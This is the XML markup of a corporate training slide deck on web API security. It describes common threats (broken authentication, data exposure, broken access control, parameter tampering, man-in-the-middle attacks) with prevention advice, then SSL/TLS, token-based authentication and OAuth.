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79" r:id="rId4"/>
    <p:sldId id="319" r:id="rId5"/>
    <p:sldId id="320" r:id="rId6"/>
    <p:sldId id="296" r:id="rId7"/>
    <p:sldId id="284" r:id="rId8"/>
    <p:sldId id="285" r:id="rId9"/>
    <p:sldId id="287" r:id="rId10"/>
    <p:sldId id="288" r:id="rId11"/>
    <p:sldId id="321" r:id="rId12"/>
    <p:sldId id="322" r:id="rId13"/>
    <p:sldId id="323" r:id="rId14"/>
    <p:sldId id="324" r:id="rId15"/>
    <p:sldId id="317" r:id="rId16"/>
    <p:sldId id="318" r:id="rId17"/>
    <p:sldId id="325" r:id="rId18"/>
    <p:sldId id="314" r:id="rId19"/>
    <p:sldId id="327" r:id="rId20"/>
    <p:sldId id="326" r:id="rId21"/>
    <p:sldId id="315" r:id="rId22"/>
    <p:sldId id="316" r:id="rId23"/>
    <p:sldId id="295" r:id="rId24"/>
    <p:sldId id="277" r:id="rId25"/>
    <p:sldId id="298" r:id="rId26"/>
    <p:sldId id="297" r:id="rId27"/>
    <p:sldId id="278" r:id="rId28"/>
    <p:sldId id="299" r:id="rId29"/>
    <p:sldId id="300" r:id="rId30"/>
    <p:sldId id="301" r:id="rId31"/>
    <p:sldId id="302" r:id="rId32"/>
    <p:sldId id="304" r:id="rId33"/>
    <p:sldId id="303" r:id="rId34"/>
    <p:sldId id="305" r:id="rId35"/>
    <p:sldId id="313" r:id="rId36"/>
    <p:sldId id="259" r:id="rId37"/>
    <p:sldId id="267" r:id="rId38"/>
    <p:sldId id="266" r:id="rId39"/>
    <p:sldId id="261" r:id="rId40"/>
    <p:sldId id="262" r:id="rId41"/>
    <p:sldId id="263" r:id="rId42"/>
    <p:sldId id="264" r:id="rId43"/>
    <p:sldId id="281" r:id="rId44"/>
    <p:sldId id="308" r:id="rId45"/>
    <p:sldId id="280" r:id="rId46"/>
    <p:sldId id="309" r:id="rId47"/>
    <p:sldId id="268" r:id="rId48"/>
    <p:sldId id="282" r:id="rId49"/>
    <p:sldId id="283" r:id="rId50"/>
    <p:sldId id="269" r:id="rId51"/>
    <p:sldId id="276" r:id="rId52"/>
    <p:sldId id="270" r:id="rId53"/>
    <p:sldId id="271" r:id="rId54"/>
    <p:sldId id="272" r:id="rId55"/>
    <p:sldId id="273" r:id="rId56"/>
    <p:sldId id="274" r:id="rId57"/>
    <p:sldId id="275" r:id="rId58"/>
    <p:sldId id="306" r:id="rId59"/>
    <p:sldId id="307" r:id="rId60"/>
    <p:sldId id="311" r:id="rId61"/>
    <p:sldId id="310" r:id="rId62"/>
    <p:sldId id="312" r:id="rId6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282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11/3/2019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11/3/2019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11/3/2019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pPr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sugoijs.com/sugoi-server/parameters-validation" TargetMode="Externa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json/" TargetMode="Externa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example.com/search?query=Alan" TargetMode="Externa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mailto:shivam.sahu@jktech.com" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:vishal.garg@jktech.com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9" y="3979391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By:- Vishal Garg and Shivam Sahu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23928" y="3003798"/>
            <a:ext cx="486003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WEB API SECURITY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7170" name="Picture 4" descr="JKTs Logo - Smal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15200" y="285750"/>
            <a:ext cx="1466850" cy="2762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xmlns="" val="303447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threats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895350"/>
            <a:ext cx="6912768" cy="460648"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Broken Authentication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515140" y="1504950"/>
            <a:ext cx="7705060" cy="3429000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What?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Attacker bypass authentication methods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Missing or inadequate authentication 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URL rewriting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>http://example.com/sale/saleitems;jsessionid=2P0OC2JSNDLPSKHCJUN2JV?dest=Hawaii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3200" u="sng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Application’s timeout is not set properly.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Passwords are not properly hashed and salted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6507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E95E21-AF47-4336-A299-17EF35C0A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5621" y="57150"/>
            <a:ext cx="7524328" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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dirty="0"/>
              <a:t>Security threats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CBD8C5A-C7DA-4602-82EE-2F67AB923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0056" y="742950"/>
            <a:ext cx="6912768" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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/>
              <a:t>Broken Authentication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Prevention:-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18F3B3E-557B-4873-A91B-27C3D54FEB1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90056" y="1581149"/>
            <a:ext cx="6912768" cy="3078833"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Solely authenticated users should be given access to the APIs.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Oauth/tokens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Never to send credentials over connections that are not trusted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don’t reveal session ID in the Web URL.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6964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threats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819150"/>
            <a:ext cx="6912768" cy="381000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> Sensitive Data Exposure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524000" y="1276350"/>
            <a:ext cx="7620000" cy="3810000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What?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Lack of encryption in transit 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unable to properly secure sensitive data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E.g.: - User information, credit card information, session tokens, passwords etc.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768C699-4F04-455C-B7CC-E93B77F6E3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79959" y="2343150"/>
            <a:ext cx="7311641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2169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B1C803-D301-4A49-BA8F-6811FAD78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672" y="57150"/>
            <a:ext cx="7524328" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security threats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B2E4A9E-9FD3-4DD4-B976-2B73ADD38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9712" y="971550"/>
            <a:ext cx="6912768" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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/>
              <a:t>Sensitive Data Exposure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Prevention:-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CBCBDCF-FE72-4D97-A878-C7CC4A49C9F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77656" y="1885949"/>
            <a:ext cx="6925168" cy="3048001"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" b="1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itchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>It is important to ensure that we incorporate strong and standard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  encryption algorithms are used and proper key management is in place. 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itchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>It is advised not to store sensitive data unnecessarily and should be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  scraped as soon as possible if it is no more required.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itchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>It can also be avoided by disabling autocomplete on forms that collect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  sensitive data such as password and disable caching for pages that contain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  sensitive data.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9458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threats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819150"/>
            <a:ext cx="6912768" cy="460648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Broken Access Control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524000" y="1276350"/>
            <a:ext cx="7620000" cy="3867150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What?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Missing or inadequate access control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Attacker to gain control of other users accounts, alter access privileges,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change data etc.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Example :-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Consider the URL for deleting the profile pic of a certain user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If the application is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vulnerable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Will shows the purchase for some other user whose id is “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25675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 profile pic of Another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user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MODLISKHA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TOOL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CCBD977-6625-4BE7-BD47-033B71CE1E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62200" y="2936599"/>
            <a:ext cx="4183743" cy="1600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2F87B5B-CE4A-4B2E-8A4A-3753B612FC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62200" y="3737599"/>
            <a:ext cx="4130398" cy="25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61032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33B06C-E39F-4C86-8E65-0B6B0C376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672" y="224454"/>
            <a:ext cx="7524328" cy="1280496"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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1800" dirty="0"/>
              <a:t>Prevention:-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9DEEDE86-D5FF-4558-8373-E6B1F1AA7D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13417" y="2876550"/>
            <a:ext cx="6066046" cy="198137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BE2793E-4C2A-4F47-B352-11A58D8C5B8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90056" y="1809750"/>
            <a:ext cx="6912768" cy="320040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Encrypted URL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random generated id’s containing both letter and numbers instead of simple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integers.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Instead of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Authorization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Proper Access Control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The user must be authorized for the information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Before the server provides it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-28575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CE38AB19-15DD-4C45-807F-EF6D9BE8B6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13417" y="3608232"/>
            <a:ext cx="4130398" cy="259102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524000" y="0"/>
            <a:ext cx="7524328" cy="884466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Security threats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524000" y="590550"/>
            <a:ext cx="6912768" cy="460648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Broken Access Control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12779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threats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819150"/>
            <a:ext cx="6912768" cy="460648"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Parameter Tampering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524000" y="1276350"/>
            <a:ext cx="7620000" cy="3867150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What?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Manipulation of parameters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Usually, stored in cookies, hidden form fields, or URL query strings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attack success depends on integrity and logic validation mechanism errors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can result in consequences including XSS, SQL Injection, file inclusion, and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path disclosure attacks.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BURP SUITE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TOOL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E.g.:-harmful website, program, instant message, blog or e-mail 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Prevention:-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Public key cryptography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validate URL parameters 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SSL(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Secure Sockets Layer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49723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threats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819150"/>
            <a:ext cx="6912768" cy="460648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Man-In-The-Middle-Attack (MITM)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524000" y="1276350"/>
            <a:ext cx="7620000" cy="3867150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What?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Attacker secretly altering, intercepting or relaying communications between two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interacting systems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Xerosploit Tool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Zanti App for Android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Two Phases :-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Interception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Prevention:-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both SSL and TLS in your APIs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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Comodo Secure Box :- Secure Box will allow you to create a threat-resistant tunnel to specific websites or portals, protect client applications from outside interference during run-time and to shield entire data repositories from attack.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809750"/>
            <a:ext cx="3095625" cy="161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34971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A09E45-0F39-4EEA-A381-C330CAD85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threats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DAC2038-5D5B-4611-BE8A-B13E6EF1E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9712" y="742951"/>
            <a:ext cx="6912768" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Man-In-The-Middle-Attack (MITM)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8BDB980-92C9-4FEE-8B17-096E873914E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90056" y="1352551"/>
            <a:ext cx="6912768" cy="3307431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itchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Some methods are used for public key Interception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rial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IP spoofing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rial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ARP spoofing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itchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS spoofing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itchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>For description need vulnerable error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rial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTTP poisoning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rial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SSL BEAST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rial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SSL hijacking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76126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CD4F7B-C4BB-416F-9E20-BDBB00940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threats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70FBCFD-D0CB-4FFA-9842-3F96E4BC3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SSL &amp; TLS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41C3A94-182F-4472-ABF2-199E31289D69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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> :- Data transfer server to server are not encrypted. Private data like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        password also transfer as plaintext.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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> +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SSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> --------&gt;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HTTP</a:t>
            </a:r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(Secure)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It creates a secure session between Web server and Web browser.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TLS advance version of SSL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Better encryption method like ECA, RSA encryption.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr 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60859F1-0A50-461D-999D-842ED4695C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33600" y="2571750"/>
            <a:ext cx="5913632" cy="73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69830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Api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Security threats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Token Based Authentication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Basic idea of OWIN Authentication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Basic idea of JWT Authentication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xmlns="" val="13165097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30D23E-3C66-4660-B804-44205D9D1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672" y="-38100"/>
            <a:ext cx="7524328" cy="884466"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security threats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C9887C3-2FA8-489E-AAD9-96194F9CD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9712" y="666750"/>
            <a:ext cx="6912768" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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Secure Sockets Layer(SSL)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96D66A1-B814-4F93-94C4-72BC5BA4213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600200" y="1123950"/>
            <a:ext cx="6912768" cy="3459833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itchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>For local testing, you can enable SSL in IIS Express from Visual Studio. In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  the Properties window, set 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SSL Enabled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to 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True</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Note the value of 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SSL </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>      URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>; use this URL for testing HTTPS connections.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D50702D-2781-4F5E-BC3B-536ED8AB9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95600" y="2190750"/>
            <a:ext cx="3871295" cy="206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779949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6EA827-C80D-4856-9C45-6DF728C7E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672" y="57150"/>
            <a:ext cx="7524328" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security threats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589481-3F23-4256-B610-9A8BB9925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666750"/>
            <a:ext cx="7139880" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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The following code shows a Web API authentication filter that checks for SSL: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D3A54276-5675-4AD6-97F9-7CE061AD7CB7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62201" y="1170667"/>
            <a:ext cx="6324600" cy="213360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383748FC-50D3-480B-8FE3-8230D95847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33600" y="4005005"/>
            <a:ext cx="5715000" cy="9906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A8EA497-EE29-4B01-A5F4-EC6B95DC78B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="3358704"/>
            <a:ext cx="6629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Add this filter to any Web API actions that require SSL:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="7434750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352550"/>
            <a:ext cx="2495550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9734576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 Based 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1524000" y="1352550"/>
            <a:ext cx="6912768" cy="2995737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Facebook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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Twitter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Google</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"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GitHub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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="666750"/>
            <a:ext cx="548640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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Who Uses Token Based Authentication?</a:t>
            </a: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US" sz="1400" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRP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 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-171450"/>
            <a:ext cx="7524328" cy="884466"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Token Based 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1295400" y="742950"/>
            <a:ext cx="7848600" cy="4400550"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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Server Based Authentication (The Traditional Method)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Store the user logged in information on the server.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b="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The Problems with Server Based Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1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>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sessions : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Every time a user is authenticated, the server will need to create a record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somewhere on our server. This is usually done in memory and when there are many users authenticating, the overhead on your server increases.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>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scalability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: As our cloud providers start replicating servers to handle application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load, having vital information in session memory will limit our ability to scale.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>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CORS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: For multiple mobile devices, we have to worry about CORS .To grab resources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from another domain (mobile to our API server),We could run into forbidden requests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>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Users are susceptible to CSRF attacks </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1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00200" y="438150"/>
            <a:ext cx="54864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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Why Tokens Came Around ?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 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 Based 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95350"/>
            <a:ext cx="838200" cy="460648"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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5" name="Content Placeholder 4" descr="securitypattern.png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5486401" y="1200150"/>
            <a:ext cx="3657600" cy="3733800"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1276350"/>
            <a:ext cx="5486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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How token based authentication actually works?</a:t>
            </a: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The client application first sends a request to Authentication </a:t>
            </a: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   server endpoint with an appropriate credential.</a:t>
            </a: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If the username/password are correct then the Authentication </a:t>
            </a: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   server send a token to the client as a response. </a:t>
            </a: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This token contains enough data to identify a particular user and an expiry time.</a:t>
            </a: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The client application then uses the token to access the restricted resources in next requests till the token is valid.</a:t>
            </a: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  Token authentication is a 2 step process.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 User pass his credentials to the Authorization server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Server returns security token if credentials are correct.</a:t>
            </a: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 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 Based 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95350"/>
            <a:ext cx="838200" cy="460648"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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0" y="895350"/>
            <a:ext cx="9144000" cy="4248150"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Why We Need token based authentication?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1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Allows users to stay logged onto a website without the use of cookies.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>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Security: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Tokens are more secure because they can be used to replace a user's actual credentials.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>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scalability of Servers:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> The token sent to the server is self contained which holds all the user information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>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Extensibility:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> share permissions with another. E.g.:-linked social accounts to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Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> or Twitter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   provide selective permissions to third-party applications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>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mobile Friendly:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Cookies and browsers like each other, but storing cookies on native platforms (Android,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iOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, Windows Phone) is not a trivial task.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>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Multiple Platforms and Domains:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> When our application and service expands, we will need to be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providing access to all sorts of devices and applications </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1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OAuth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4682852"/>
            <a:ext cx="6912768" cy="4606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600200" y="895350"/>
            <a:ext cx="7543800" cy="36576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OAuth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> stands for “Open Authorization” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>An open standard protocol that provides simple and secure authorization for different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types of applications </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A simple and safe method for consumers to interact with protected data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Allows providers to give access to users without any exchange of credentials Designed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for use only with HTTP protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.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OAuth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4682852"/>
            <a:ext cx="6912768" cy="4606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600200" y="895350"/>
            <a:ext cx="7543800" cy="36576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>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>It is flexible, compatible and designed to work with mobile devices and desktop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applications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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Provides a method for users to grant third-party access to their resources without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sharing their credentials. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"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Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
